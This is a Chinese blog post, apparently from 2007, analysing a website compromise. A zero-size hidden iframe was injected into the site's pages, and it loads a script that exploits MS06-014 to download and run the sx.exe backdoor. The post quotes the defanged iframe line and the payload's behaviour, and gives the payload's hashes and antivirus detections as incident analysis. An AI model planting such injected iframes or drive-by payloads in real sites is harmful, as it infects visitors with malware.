某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe

最新推荐文章于 2025-12-03 18:49:33 发布
最新推荐文章于 2025-12-03 18:49:33 发布 · 91 阅读 · 0
文章标签:

#运维 #javascript #shell #ViewUI

本文分析了一起针对某广电行业网站的挂马事件,详细介绍了黑客如何通过植入恶意代码利用MS06014漏洞下载并运行Backdoor.Win32.Gpigeon.aic木马。

某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe

endurer 原创
2007-09-06 第1

网站页面被植入代码:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/

hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript脚本,首先输出escape编码的信息:
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞,下载 sx.exe,保存为 %system32%/Cuteqq_Cn.exe,再用 shell.execute来运行。

文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97

使用的是WMP媒体文件的图标


Kasepersky 报为 Packed.Win32.Klone.af

主 题:病毒上报邮件分析结果-流水单号:20070905125954073811
发件人:"" <send@rising.net.cn>发送时间2007.09.05 14:16
尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。

我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:sx.exe
病毒名: Backdoor.Win32.Gpigeon.aic

您所上报的病毒文件将在19.39.30版本中处理解决。
iteye_6637
关注
Tribon模型数据抽取之sx700.exe详解
ringsunkaiya的博客
06-09 2951
一:简介 网络上关于Tribon模型数据抽取的论文最早流传的是2006哈尔滨工程大学姚竞争的工学硕士学位论文《TRIBON模型的数据抽取及二次开发》,详细文章大家可以自行百度查阅,其中一共介绍五中数据抽取方法,常用的是第二种、第三种、第四种。 几何宏语言程序进行数据抽取 Python脚本程序抽取 COM—OBJECT方法 SX700终端查询程序 报表生成器 Python脚本程序抽取:通过Vitesse接口调用Tribon内置的API函数和相关的内置类来完成模型(船、...
Backdoor.Win32.Rbot病毒专杀
02-17
重新启动,打开工具直接绿色运行,本工具是经过在xp系统上测试过的,没有问题,win7还没有测试
win11遇到win32kbase.sys蓝屏解决方法;(超级详细,不懂的请私信up主)
热门推荐
私信up主,有惊喜
08-09 12万+
win11win32kbase.sys蓝屏解决方法
终于把知道如何把win32.sys文件了
aasa2的专栏
12-12 2781
html.win32.scipt病毒,Win32/Induc.A是什么病毒该如何解决
weixin_42333370的博客
06-29 1059
Virus/Win32.Induc.a是这是Delphi感染型病毒,通过感染Delphi库文件中的SysConst.dcu文件,进而使Delphi编写的所有文件染毒,目前尚不知其危害,网上说其没有危害。 该病毒实际上并不具有危害性,只是其更改了库文件后使编译生成的所有程序均带有不正常代码,而其代码行为即为以上描述。 这个病毒具有二次感染能力,也就是说原来你编译出来的所有Delphi程序都可以再次感...
Backdoor.Zegost木马病毒分析(一)
Fly20141201. 的专栏
12-27 5655
http://blog.csdn.net/qq1084283172/article/details/50413426 一、样本信息 样本名称:rt55.exe 样本大小: 159288 字节 文件类型:EXE文件 病毒名称:Win32. Backdoor.Zegost 样本MD5:C176AF21AECB30C2DF3B8B8D8AA27510 样本SHA1:16E95
遭遇beep.sys/Backdoor.Win32.Agent,DOVA/Backdoor.Win32.Hupigon,myRAT.rmvb/Trojan.Win32.Delf等2
Purpleendurer@优快云
06-22 2132
遭遇beep.sys/Backdoor.Win32.Agent,DOVA/Backdoor.Win32.Hupigon,myRAT.rmvb/Trojan.Win32.Delf等2endurer 原创 2008-06-22 第1版(继1)到 http://purpleendurer.ys168.com 下载 FileInfo 和 bat_do。用FileInfo 提取 pe_x
传说中进程守护的灰鸽子(Backdoor.Win32.Hupigon)
迷失在某一个角落
08-15 1295
文件名称:Time.exe文件大小:486400 bytesAV命名:Backdoor.Win32.Hupigon.fel 中文别名:灰鸽子加壳方式:SVKP 1.3x编写语言:Borland Delphi 6.0 - 7.0病毒类型:后门文件MD5:f4b4eb6a158e575d33a18f6c1303e52a 文件SHA1:3faa0f93a0a12361fb
遭遇 Backdoor.Win32.Agent.amb / serivces.exe
Purpleendurer@优快云
07-23 1438
遭遇 Backdoor.Win32.Agent.amb / serivces.exeendurer 原创2007-07-23 第1版有网友说,他用U盘从另一台电脑A中拷贝了文件,回来把U盘接入电脑后,卡巴报告发现病毒。请偶远程协助检查电脑A。下载 pe_xscan 扫描 log并分析,发现如下可疑项:/===pe_xscan 07-07-21 by Purple Endurer2007
Backdoor.Win32.Hupigon.dsx专杀
06-14
【病毒名称】:Backdoor.Win32.Hupigon.dsx 【病毒类型】:后门 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 病毒运行后,首先修改该系统时间,致使一些杀软安软因系统时间不符...
Linux.BackDoor.Gates.5木马处理文档
11-13
生产使用的Linux.BackDoor.Gates.5木马处理文档!
Backdoor.Win32.Rbot病毒清除工具绿色版发布
Backdoor.Win32.Rbot 是一种被广泛识别的恶意后门程序,属于远程控制类病毒的一种。这种病毒的主要特征是允许攻击者远程控制受感染的计算机系统,从而进行诸如数据窃取、远程命令执行、系统监视等恶意活动。Backdoor...
快速搭建DNS服务器完整教程
APang的博客
12-03 563
本文介绍了在CentOS 7上配置DNS服务的完整流程。首先更换阿里云yum源,然后安装DNS相关服务。重点讲解了主配置文件named.conf的修改,包括监听端口和访问权限设置。详细说明了正反向解析配置文件的编写方法,强调网段需要倒序书写并添加特定后缀。提供了正反向区域文件的模板示例,并指出配置验证方法。最后介绍了服务的启动、验证及客户端配置步骤,完成基础DNS服务的搭建。整个过程涵盖了从软件安装到配置测试的全流程。
Java中的类加载器工作原理
yachaorui的博客
12-01 979
Java类加载机制解析 摘要:Java类加载是将.class文件加载到虚拟机的初始步骤,由类加载器通过全限定名获取二进制字节流并转化为运行时数据结构。类加载器采用双亲委派模型,分为启动类、扩展类和应用程序类加载器三种。每个类加载器拥有独立命名空间,确保类的唯一性。开发者可自定义类加载器,只需重写findClass方法。类加载器会缓存已加载类的实例,避免重复加载。该机制实现了类的隔离与共享,是Java安全性和灵活性的重要基础。
Linux进程管理、服务管理、磁盘分区管理、ntp与chrony服务配置
m0_73599398的博客
12-03 795
本文摘要:文章系统介绍了Linux系统管理中的三个核心内容。在进程管理部分,详细讲解了进程概念、PID标识、状态分类(R/S/D/Z/T)、kill命令和nohup后台运行机制。服务管理章节阐述了systemctl的基本操作和自定义服务创建方法。磁盘分区管理部分涵盖了分区类型、文件系统、挂载操作、分区表类型以及完整的磁盘添加和分区创建流程。通过命令示例和状态说明,全面展示了Linux系统资源管理的核心技术和操作方法。
Linux性能调优详解FIO性能测试的几个常用场景
运维老生常谈
11-29 697
fio是测试存储系统非常重要的工具,能够快速检测出磁盘的IOPS、吞吐能力,以及时间延迟。该工具能够发起指定类型的IO操作,例如顺序读写、随机读写。同时还可以发起多线性,模拟高负载场景。针对常用的IOPS、吞吐量、时延,如何有效利用fio工具,下面进行详细的讲解。
Docker:基于自制openjdk8镜像 or 官方openjdk8镜像,制作tomcat镜像
2509_94186105的博客
11-30 454
78.56 MBopenjdk二进制下载地址Dockerfile中,source /etc/profile不能加载的原因为什么还需要选择使用他的原因:三 中,tomcat普通用户交互式启动tomcat#在 Docker 容器中,/etc/profile 文件不会在容器启动时自动执行,这是因为 Docker 容器通常不会启动交互式登录 shell,而是直接运行指定的命令。
openEuler + Nginx 高性能 Web 服务深度评测
最新发布
笃行其道的博客
12-03 958
本文介绍了在openEuler操作系统上部署Nginx集群的性能测试方案。通过优化内核参数、资源限制和系统调优,在32核64GB环境的华为云实例上进行八大维度的压测:静态文件服务测试显示小文件QPS达23万+,大文件传输速率13.97GB/s;反向代理性能测试QPS23万;HTTPS测试降幅仅16%;长连接测试QPS8.6万;压缩测试显示99%压缩率;极限测试支撑10万+并发。测试结果表明,openEuler的网络/I/O优化与Nginx事件驱动架构完美结合,CPU利用率96%且内存占用<10%,延迟
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值